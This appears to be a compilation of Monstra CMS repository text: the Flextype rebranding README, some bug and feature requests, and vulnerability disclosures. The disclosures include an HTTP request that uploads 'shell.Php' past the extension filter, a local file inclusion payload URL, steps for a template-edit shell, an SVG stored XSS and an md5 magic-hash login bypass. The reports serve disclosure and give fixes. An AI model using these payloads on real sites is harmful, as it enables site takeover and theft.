Vulnerability Type Cross-site scripting, in the login of administrator, and to retrieve the password and register a user from the part of the customer!

Dear Friends and Monstra Followers! I need to inform you about big infrastructure changes.

Project Monstra was rebranded to Flextype! That is means that project Monstra will not supported any more! I am working on a new project called Flextype!

Flextype is Open Source, fast and flexible file-based Content Management System. That's Easy to install, upgrade and use. Flextype provides amazing API's for plugins, themes and core developers! Content in Flextype is just a simple files written with markdown syntax in pages folder. You simply create markdown files in the pages folder and that becomes a page.

FEATURES

Simple

Easy to install, upgrade and use.
No installation needed, just copy files to your server!

Fast

Flextype is realy fast and lightweight!
No database required, flat files only!

Flexible

Flextype provides amazing API for plugins, themes and core developers!

Markdown Syntax

Use your favorite editor to write your content with plain Markdown syntax.

Dynamic Content Types

The flat-file nature of Flextype lets you define custom fields for any of your pages.

Open Source

Flextype is an open-source project licensed under the MIT LICENSE to set the world free!

REQUIREMENTS

PHP 7.1.3 or higher with PHP's Multibyte String module
Apache with Mod Rewrite

INSTALLATION

Using (S)FTP

Download the latest version.

Unzip the contents to a new folder on your local computer, and upload to your webhost using the (S)FTP client of your choice. After you’ve done this, be sure to chmod the following directories (with containing files) to 777, so they are readable and writable by Flextype:

• site/

Using Composer

You can easily install Flextype with Composer.

composer create-project flextype/flextype

Also you may need to install node_modules libs for default Simple Theme

cd /flextype/site/themes/simple  
npm install
gulp

COMMUNITY

Flextype is open source, community driven project, and maintained by community!

• Forum
• Github Repository
• Gitter

NO LIMITS

With Flextype you can create any project you whant.

• Business site
• Landing page
• Personal site
• Portfolio
• Product site
• Documentation
• Personal resume
• Blog

CONTRIBUTE

Flextype is an open source project and community contributions are essential to its growing and success. Contributing to the Flextype is easy and you can give as little or as much time as you want.

• Help on the Forum.
• Develop a new plugin.
• Create a new theme.
• Find and report issues.
• Link back to Flextype.
• Donate to keep Flextype free.

LINKS

• Site
• Forum
• Documentation

LICENSE

See LICENSE

If you not agree about getting notifications from GitHub about project update, please unfollow it.

Hi,

I have one issue, if I change language at installation process from english into whatever, than is visible only blank page. Remove all files, download and unzip, new installation with english work very well.

The Sitemap has an validation Error

plugins/box/sitemap/views/frontend/index.view.php

<h3><?php echo __('Sitemap', 'sitemap'); ?></h3>
<hr>
<ul>
<?php

    // Display pages
    if (count($pages_list) > 0) {
        foreach ($pages_list as $page) {
            if (trim($page['parent']) !== '') $parent = $page['parent'].'/'; else $parent = '';
            if (trim($page['parent']) !== '') { echo '<ul>'; }
            echo '<li><a href="'.Option::get('siteurl').$parent.$page['slug'].'">'.$page['title'].'</a></li>';
            if (trim($page['parent']) !== '') { echo '</ul>'; }
        }
        if (count($components) == 0) { echo '<ul>'; }
    }

    // Display components
    if (count($components) > 0) {
        if (count($pages_list) == 0) { echo '<ul>'; }
        foreach ($components as $component) {
            echo '<li><a href="'.Option::get('siteurl').$component.'">'.__(ucfirst($component), $component).'</a></li>';
        }
        echo '</ul>';

    }

?>
</ul>

ERROR 1 - Script from above gives this result on default Template:

<ul>
    <li><a href="http://site.com/">Home</a></li>
    <li><a href="http://site.com/users">Users</a></li>
</ul>
</ul>

here are 2 closing </ul>'s

ERROR 2 - if Submenu is existing it gives this code:

<ul>
    <li><a href="http://site.com/">Home</a></li>
    <li><a href="http://site.com/test">Test</a></li>
    <ul>
        <li><a href="http://site.com/test/sub-1">Sub 1</a></li>
    </ul>
    <ul>
        <li><a href="http://site.com/test/sub-2">Sub 2</a></li>
    </ul>
    <li><a href="http://site.com/users">Users</a></li>
</ul>
</ul>

but it should look like this:

<ul>
    <li><a href="http://site.com/">Home</a></li>
    <li><a href="http://site.com/test">Test</a></li>
    <ul>
        <li><a href="http://site.com/test/sub-1">Sub 1</a></li>
        <li><a href="http://site.com/test/sub-2">Sub 2</a></li>
    </ul>
    <li><a href="http://site.com/users">Users</a></li>
</ul>

for better sourcecode view it would be useful to add a linebreak after </li> :smile:

Files Manager Must be totally improved.
This new features must be added:

• Drag and Drop uploads. - DONE
• Basic work with Files and Directories
  Create & Edit Files Create Directory - DONE
  Ability to rename Files & Directories

Problem with similar shortcodes names. Shortcodes parser think for e.g. that shortcode "news" and "newslike" is the same.

Maybe problem is here: https://github.com/Awilum/monstra-cms/blob/dev/monstra/engine/shortcodes.php

$pattern = "/(.?)\{($shortcodes)(.*?)(\/)?\}(?(4)|(?:(.+?)\{\/\s*\\2\s*\}))?(.?)/s";

Shortcode::add() does not work for the class, Page. However, when called "after" the Page class, it works.

Actually, {page_author}, {page_slug}, {page_url}, {page_date} and {page_content} do not work as expected.

is it possible to add a feature?

before you delete an user: php should check if the user is an admin and the only existing admin. otherwise you can get some trouble when deleting the wrong user :D

Added option to hide 'users' list from public from admin/users menu. Change affects: users listing and viewing others profiles availability, sitemap creation

It will be nice to made comments plugin avaible by the default. I can't find something usefull.

Было бы замечательно видеть плагин "Комментарии" встроенным в систему по умолчанию, причем с собственным шорт-кодом, чтобы его можно было выводить на любой странице.

How to reproduce:

1. copy existing default theme folder, then rename it to e.g: defaultx
2. edit default.css anything, change color, etc in Admin Panel -> Extend -> Themes -> Styles -> Edit button
3. delete temporary files in Admin Panel -> System -> Settings -> Delete Temporary Files
4. Visit your frontend, refresh, view minified css, no changes done

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@anhdq201) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

Brief of this vulnerability

The Monstra 3.0.4 source code does not filter the case of php, which leads to an unrestricted file upload vulnerability.

Test Environment

Apache/2.4.41 (Ubuntu20.04)
PHP 7.4.3

Affect version

<=3.0.4

POC

POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1
Host: localhost:80
Content-Length: 442
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:65003
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6KF8q8SlXAspgP7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:65003/monstra/admin/index.php?id=filesmanager&path=uploads/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=nlofifites91aq2tsi1s520298
Connection: close

------WebKitFormBoundaryD6KF8q8SlXAspgP7
Content-Disposition: form-data; name="csrf"

8ff9a93b1f09f4dfa18e06c201b7355e602ea9ce
------WebKitFormBoundaryD6KF8q8SlXAspgP7
Content-Disposition: form-data; name="file"; filename="shell.Php"
Content-Type: text/plain

<?php echo "This is a test";?>
------WebKitFormBoundaryD6KF8q8SlXAspgP7
Content-Disposition: form-data; name="upload_file"

上传
------WebKitFormBoundaryD6KF8q8SlXAspgP7--

Execute successfully

Reason of This Vulnerability

$_FILES['file']['name'] in the Upload file module does not check whether the file extension is case,Vulnerability file：/plugins/box/filesmanager/filesmanager.admin.php

        // Upload file
        // -------------------------------------
        if (Request::post('upload_file')) {

            if (Security::check(Request::post('csrf'))) {

                $error = false;
                if ($_FILES['file']) {
                    if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                        $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                        $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                        if ($uploaded !== false && is_file($filepath)) {
                            Notification::set('success', __('File was uploaded', 'filesmanager'));
                        } else {
                            $error = 'File was not uploaded';
                        }
                    } else {
                        $error = 'Forbidden file type';
                    }
                } else {
                    $error = 'File was not uploaded';
                }

                if ($error) {
                    Notification::set('error', __($error, 'filesmanager'));
                }

                if (Request::post('dragndrop')) {
                    Request::shutdown();
                } else {
                    Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                }
            } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
        }

Repair suggestions

Add case verification at $_FILES['file']['name'], as follows:

        // Upload file
        // -------------------------------------
        if (Request::post('upload_file')) {

            if (Security::check(Request::post('csrf'))) {

                $error = false;
                if ($_FILES['file']) {
					$_FILES['file']['name']=strtolower($_FILES['file']['name']);  //Change uppercase to lowercase
                    if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                        $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                        $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                        if ($uploaded !== false && is_file($filepath)) {
                            Notification::set('success', __('File was uploaded', 'filesmanager'));
                        } else {
                            $error = 'File was not uploaded';
                        }
                    } else {
                        $error = 'Forbidden file type';
                    }
                } else {
                    $error = 'File was not uploaded';
                }

                if ($error) {
                    Notification::set('error', __($error, 'filesmanager'));
                }

                if (Request::post('dragndrop')) {
                    Request::shutdown();
                } else {
                    Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                }
            } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
        }

Brief of this vulnerability There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code

Test Environment

Apache/2.4.39 (Windows10)
PHP 5.4.45-2+mysql 5.7.26

Affect version <=3.0.4

payload

http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=filename

We can create phpinfo.txt In the web directory, the content is<?php phpinfo();?>

http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\www\phpinfo.txt

Or we can use Apache logs

1. use burpsuite

2. include log http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log

Reason of This Vulnerability Directly from the get parameter and include this parameter, resulting in a vulnerability，Vulnerability file： plugins\captcha\crypt\cryptographp.inc.php

#..\plugins\captcha\crypt\cryptographp.inc.php
if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) {
    header("Content-type: image/png");
    readfile('images/erreur3.png');
    exit;
}

if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); }

session_start();

// Takes only the configuration files in the same directory
if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else {  $_SESSION['configfile'] = "cryptographp.cfg.php"; }

include($_SESSION['configfile']);

As long as we assign a value to the sn variable and it is not empty, we can skip the first 2 if syntax，The variable CFG is directly assigned to configFile, and then the include method is executed, resulting in a vulnerability

Vulnerability profile: In edit blog template, we can control the website system by writing PHP executable code and running malicious code Test environment: PHP version 5.6.2 +appach Affected version <=3.0.4 Vulnerability details:

1. Use the administrative user to log in to the website: http://ip:port/monstra/admin/index.php?id=themes&action=edit_ template&filename=blog

2.Write PHP executable code in template content

3.Save the modified template content,visit:http://ip:port/monstra/blog Get shell and control the website

Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Files" feature. Monstra application allows the upload of a SVG file extension (which is also an image type). ** Reproduce** Steps to reproduce the behavior:

1. Login into the panel Monstra
2. Go to "/admin/index.php?id=filesmanager&path=uploads/"
3. Upload file abc.svg:

4. Open file upload : "/public/uploads/abc.svg"
5. View the preview to trigger XSS.
6. View the preview to get in request and such Stored XSS. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. Screenshots Desktop (please complete the following information):

• OS: Kali
• Browser: Firefox
• Version of Browser: 68.6

Hi, I'd like to report a potential authentication bypass problem using loose comparison.

In monstra/admin/index.php:38, the password checking is currently using loose comparison (==) instead of strict. However, the password in monstra is computed usingmd5 functions in monstra/engine/Security.php:98, which suffers from magic hash problem. If the hash value starts from 0e, which will be treated as 0 during the comparison. An attacker can bypass the authentication using a crafted password with similar hash value.

This problem also appears in other parts of monstra. For example, the plugin box has a similar issue.

This can be easily fixed via strict comparison(===).

Reference to magic hash